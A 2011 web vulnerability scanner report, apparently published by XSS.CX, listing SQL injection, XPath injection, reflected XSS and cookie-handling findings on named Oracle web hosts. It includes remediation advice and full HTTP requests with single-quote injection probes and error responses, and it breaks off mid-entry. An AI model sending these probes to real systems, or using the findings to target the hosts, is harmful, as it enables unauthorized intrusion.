XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, Oracle HTTP Systems Report generated by XSS.CX at Mon Oct 17 08:13:44 CDT 2011. Loading
1. SQL injection
1.1. http://apex.oracle.com/pls/otn/f [p parameter]
1.2. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [curloc parameter]
1.3. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [degree parameter]
1.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [email parameter]
1.5. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [fname1 parameter]
1.6. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [gdate parameter]
1.7. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [lname1 parameter]
1.8. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [major parameter]
1.9. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [phone parameter]
1.10. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [ploc parameter]
1.11. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position1 parameter]
1.12. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position2 parameter]
1.13. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position3 parameter]
1.14. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [university parameter]
1.15. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_arg_names parameter]
1.16. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_flow_step_id parameter]
1.17. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [User-Agent HTTP header]
1.18. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [gpw_e24 cookie]
1.19. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [p_cur_URL cookie]
1.20. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_nr cookie]
1.21. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_sess cookie]
1.22. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_wgw_lv cookie]
1.23. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [gpw_e24 cookie]
1.24. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [s_cc cookie]
1.25. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [s_nr cookie]
1.26. https://irecruitment.oracle.com/OA_HTML/OA.jsp [GSI cookie]
1.27. https://shop.oracle.com/pls/ostore/f [p parameter]
1.28. https://shop.oracle.com/pls/ostore/f [s_sess cookie]
1.29. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t03 parameter]
1.30. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t04 parameter]
1.31. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t13 parameter]
1.32. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t18 parameter]
1.33. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t19 parameter]
1.34. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t31 parameter]
1.35. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t32 parameter]
1.36. http://solutions.oracle.com/portal/page/portal/searchresults [mo parameter]
2. XPath injection
2.1. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [GSI cookie]
2.2. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [ORA_MOS_LOCALE cookie]
2.3. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [Referer HTTP header]
2.4. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [User-Agent HTTP header]
2.5. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [gpv_p24 cookie]
2.6. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [gpw_e24 cookie]
2.7. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [name of an arbitrarily supplied request parameter]
2.8. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_cur_URL cookie]
2.9. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_lang cookie]
2.10. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_org_id cookie]
2.11. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_cc cookie]
2.12. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_nr cookie]
2.13. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_nr6 cookie]
2.14. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_pers cookie]
2.15. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_sess cookie]
2.16. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_sq cookie]
2.17. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_wgw_lv cookie]
3. Cross-site scripting (reflected)
3.1. https://campus.oracle.com/campus/HR/us-profile-direct.jsp [flag parameter]
3.2. https://campus.oracle.com/campus/HR/us-upload-file.jsp [flag parameter]
3.3. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_md5_checksum parameter]
3.4. http://events.oracle.com/search/search [keyword parameter]
3.5. http://events.oracle.com/search/search [name of an arbitrarily supplied request parameter]
3.6. http://events.oracle.com/search/search [pageHitCount parameter]
3.7. http://events.oracle.com/search/search [start parameter]
3.8. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]
3.9. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp [name of an arbitrarily supplied request parameter]
3.10. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwsbr_javascript.page_js [REST URL parameter 3]
3.11. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwui_api_body.render_wizard_css [REST URL parameter 3]
3.12. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations [REST URL parameter 3]
3.13. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_javascript.fetch_script [REST URL parameter 3]
3.14. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_css [REST URL parameter 3]
3.15. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_custom_css [REST URL parameter 3]
3.16. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_custom_css [p_bg_color parameter]
4. SSL cookie without secure flag set
4.1. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp
4.2. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp
4.3. https://campus.oracle.com/campus/HR/us-calendar.jsp
4.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp
4.5. https://campus.oracle.com/campus/HR/us-profile-direct.jsp
4.6. https://campus.oracle.com/campus/HR/us-upload-file.jsp
4.7. https://cloud.oracle.com/mycloud/f
4.8. https://cloud.oracle.com/mycloud/wwv_flow.accept
4.9. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp
4.10. https://login.oracle.com/favicon.ico
4.11. https://login.oracle.com/mysso/signon.jsp
4.12. https://login.oracle.com/mysso/sso_loginui/b-bg.gif
4.13. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
4.14. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
4.15. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
4.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
4.17. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
4.18. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
4.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
4.20. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
4.21. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
4.22. https://login.oracle.com/mysso/sso_loginui/loginStyling_external.css
4.23. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
4.24. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
4.25. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
4.26. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
4.27. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
4.28. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
4.29. https://login.oracle.com/mysso/sso_loginui/sso_check.js
4.30. https://login.oracle.com/mysso/sso_loginui/t-bg.gif
4.31. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
4.32. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
4.33. https://login.oracle.com/oam/server/sso/auth_cred_submit
4.34. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
4.35. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp
4.36. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
5. Session token in URL
5.1. https://campus.oracle.com/campus/HR/global_home.html
5.2. https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image
5.3. https://cloud.oracle.com/mycloud/f
5.4. https://cloud.oracle.com/mycloud/wwv_flow.accept
5.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
6. Cookie without HttpOnly flag set
6.1. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp
6.2. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp
6.3. https://campus.oracle.com/campus/HR/us-calendar.jsp
6.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp
6.5. https://campus.oracle.com/campus/HR/us-profile-direct.jsp
6.6. https://campus.oracle.com/campus/HR/us-upload-file.jsp
6.7. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp
6.8. https://irecruitment.oracle.com/OA_HTML/OA.jsp
6.9. https://irecruitment.oracle.com/OA_HTML/RF.jsp
6.10. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp
6.11. https://cloud.oracle.com/mycloud/f
6.12. https://cloud.oracle.com/mycloud/wwv_flow.accept
6.13. https://login.oracle.com/favicon.ico
6.14. https://login.oracle.com/mysso/signon.jsp
6.15. https://login.oracle.com/mysso/sso_loginui/b-bg.gif
6.16. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
6.17. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
6.18. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
6.19. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
6.20. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
6.21. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
6.22. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
6.23. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
6.24. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
6.25. https://login.oracle.com/mysso/sso_loginui/loginStyling_external.css
6.26. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
6.27. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
6.28. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
6.29. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
6.30. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
6.31. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
6.32. https://login.oracle.com/mysso/sso_loginui/sso_check.js
6.33. https://login.oracle.com/mysso/sso_loginui/t-bg.gif
6.34. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
6.35. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
6.36. https://login.oracle.com/oam/server/sso/auth_cred_submit
6.37. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
6.38. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
6.39. http://solutions.oracle.com/
6.40. http://solutions.oracle.com/portal/page/portal/OPN/sol_cat_wrapper
6.41. http://solutions.oracle.com/portal/page/portal/OPN/sol_cat_wrapper/
6.42. http://solutions.oracle.com/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/
6.43. http://solutions.oracle.com/specializedpartners/
7. Source code disclosure
8. Cross-domain POST
9. Cookie scoped to parent domain
9.1. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp
9.2. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp
9.3. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
10. Cross-domain Referer leakage
10.1. http://apex.oracle.com/pls/otn/f
10.2. http://events.oracle.com/search/search
11. Cross-domain script include
11.1. https://campus.oracle.com/campus/HR/aus_main.html
11.2. https://campus.oracle.com/campus/HR/cn_main.html
11.3. https://campus.oracle.com/campus/HR/india_main.html
11.4. https://campus.oracle.com/campus/HR/sg_main.html
11.5. http://crmondemand.oracle.com/en/index.htm.
11.6. http://events.oracle.com/search/search
11.7. http://solutions.oracle.com/home/basic_search
11.8. http://solutions.oracle.com/portal/page/portal/auto_searches/browse_products/
11.9. http://solutions.oracle.com/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/
11.10. http://solutions.oracle.com/portal/page/portal/error
11.11. http://solutions.oracle.com/portal/page/portal/searchresults
11.12. http://solutions.oracle.com/solutions/bmg/consulting
11.13. http://solutions.oracle.com/specializedpartners/
12. File upload functionality
13. Email addresses disclosed
13.1. https://campus.oracle.com/campus/HR/aus_main.html
13.2. https://campus.oracle.com/campus/HR/cn_main.html
13.3. https://campus.oracle.com/campus/HR/emea_main.html
13.4. https://campus.oracle.com/campus/HR/india_main.html
13.5. https://campus.oracle.com/campus/HR/japan_main.html
13.6. https://campus.oracle.com/campus/HR/script/s_code.js
13.7. https://campus.oracle.com/campus/HR/sg_main.html
13.8. https://campus.oracle.com/campus/HR/zealand-apply.html
13.9. https://campus.oracle.com/campus/campus_feed.xml
13.10. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
13.11. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/adapter/ext/ext-base.js
13.12. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/ext-all.js
13.13. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/resources/css/ext-all.css
13.14. http://crmondemand.oracle.com/error/s_code.js
13.15. https://irecruitment.oracle.com/OA_HTML/OA.jsp
13.16. https://irecruitment.oracle.com/OA_HTML/RF.jsp
13.17. https://irecruitment.oracle.com/OA_HTML/s_code.js
13.18. https://shop.oracle.com/pls/ostore/f
13.19. http://solutions.oracle.com/img/opn_navtree.js
13.20. http://solutions.oracle.com/img/s_code19b.js
13.21. http://solutions.oracle.com/portal/page/portal/searchresults
14. Credit card numbers disclosed
14.1. https://cloud.oracle.com/mycloud/f
14.2. https://cloud.oracle.com/mycloud/wwv_flow.accept
15. Cacheable HTTPS response
15.1. https://campus.oracle.com/campus/
15.2. https://campus.oracle.com/campus/HR/apac-subscribe.html
15.3. https://campus.oracle.com/campus/HR/apac_internship.html
15.4. https://campus.oracle.com/campus/HR/aus_main.html
15.5. https://campus.oracle.com/campus/HR/cn_main.html
15.6. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp
15.7. https://campus.oracle.com/campus/HR/emea-internship.html
15.8. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp
15.9. https://campus.oracle.com/campus/HR/emea_main.html
15.10. https://campus.oracle.com/campus/HR/global_aboutus.html
15.11. https://campus.oracle.com/campus/HR/global_current-openings.html
15.12. https://campus.oracle.com/campus/HR/global_history.html
15.13. https://campus.oracle.com/campus/HR/global_home.html
15.14. https://campus.oracle.com/campus/HR/global_internship.html
15.15. https://campus.oracle.com/campus/HR/global_main.html
15.16. https://campus.oracle.com/campus/HR/global_main_about.html
15.17. https://campus.oracle.com/campus/HR/global_scope.html
15.18. https://campus.oracle.com/campus/HR/global_vision.html
15.19. https://campus.oracle.com/campus/HR/global_why.html
15.20. https://campus.oracle.com/campus/HR/hk_main.html
15.21. https://campus.oracle.com/campus/HR/india_main.html
15.22. https://campus.oracle.com/campus/HR/indo_main.html
15.23. https://campus.oracle.com/campus/HR/instructions.html
15.24. https://campus.oracle.com/campus/HR/japan_main.html
15.25. https://campus.oracle.com/campus/HR/korea_main.html
15.26. https://campus.oracle.com/campus/HR/lad-internship.html
15.27. https://campus.oracle.com/campus/HR/lad_main.html
15.28. https://campus.oracle.com/campus/HR/malay_main.html
15.29. https://campus.oracle.com/campus/HR/news.html
15.30. https://campus.oracle.com/campus/HR/pak_main.html
15.31. https://campus.oracle.com/campus/HR/ph_main.html
15.32. https://campus.oracle.com/campus/HR/sg_main.html
15.33. https://campus.oracle.com/campus/HR/sitemap.html
15.34. https://campus.oracle.com/campus/HR/thai_main.html
15.35. https://campus.oracle.com/campus/HR/transition_4.html
15.36. https://campus.oracle.com/campus/HR/us-apply_now.html
15.37. https://campus.oracle.com/campus/HR/us-calendar.jsp
15.38. https://campus.oracle.com/campus/HR/us-home.html
15.39. https://campus.oracle.com/campus/HR/us-internship-global.html
15.40. https://campus.oracle.com/campus/HR/us-profile-direct.jsp
15.41. https://campus.oracle.com/campus/HR/us-profile.html
15.42. https://campus.oracle.com/campus/HR/us-profile_mobile.html
15.43. https://campus.oracle.com/campus/HR/us-profile_mobile_redirect.html
15.44. https://campus.oracle.com/campus/HR/us-upload-file.jsp
15.45. https://campus.oracle.com/campus/HR/us_main.html
15.46. https://campus.oracle.com/campus/HR/viet_main.html
15.47. https://campus.oracle.com/campus/HR/zealand-apply.html
15.48. https://campus.oracle.com/campus/HR/zealand-home.html
15.49. https://campus.oracle.com/campus/HR/zealand_main.html
15.50. https://campus.oracle.com/campus/campus_feed.xml
15.51. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
15.52. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html
15.53. https://cloud.oracle.com/mycloud/f
15.54. https://cloud.oracle.com/mycloud/wwv_flow.accept
15.55. https://irecruitment.oracle.com/OA_HTML/OA.jsp
15.56. https://irecruitment.oracle.com/OA_HTML/RF.jsp
15.57. https://irecruitment.oracle.com/OA_HTML/blank.html
15.58. https://login.oracle.com/oam/server/sso/auth_cred_submit
15.59. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
15.60. https://shop.oracle.com/
15.61. https://shop.oracle.com/pls/ostore/f
16. HTML does not specify charset
16.1. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
16.2. http://crmondemand.oracle.com/favicon.ico
16.3. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js
16.4. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigation.js
16.5. http://events.oracle.com/
16.6. https://irecruitment.oracle.com/OA_HTML/blank.html
16.7. https://shop.oracle.com/
17. Content type incorrectly stated
17.1. https://campus.oracle.com/campus/HR/images/bullet2.png
17.2. https://shop.oracle.com/pls/ostore/f
17.3. http://solutions.oracle.com/img/opn_sc7.css
18. Content type is not specified
18.1. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
18.2. https://login.oracle.com/mysso/sso_loginui/sso_check.js
18.3. https://login.oracle.com/oam/server/sso/auth_cred_submit
18.4. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
1. SQL injection
next
There are 36 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed. Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://apex.oracle.com/pls/otn/f [p parameter]
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://apex.oracle.com
Path:
/pls/otn/f
Issue detail
The p parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /pls/otn/f?p=42988:2' HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/corporate/contact/about-your-account-070507.html;q=0.3.oracle.com%2Fus%2Fcorporate%2Fcontact%2Fabout-your-account-070507.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fcorporate%25252Fcontact%25252Fabout-your-account-070507.html%2526pidt%253D1%2526oid%253Djavascript%25253AopenWindow('http%25253A%25252F%25252Fapex.oracle.com%25252Fpls%25252Fotn%25252Ff%25253Fp%25253D42988%25253A2'%25252C''%25252C'595'%25252C'435')%2526ot%253DA
Response
HTTP/1.1 200 OK-11g>ERR-1412 Unable to resolve page alias (2').</td></tr><tr><td></td><td></td><td>ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error...[SNIP]...
1.2. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [curloc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The curloc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the curloc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss' &ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss'' &ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.3. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [degree parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The degree parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the degree parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors' &major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
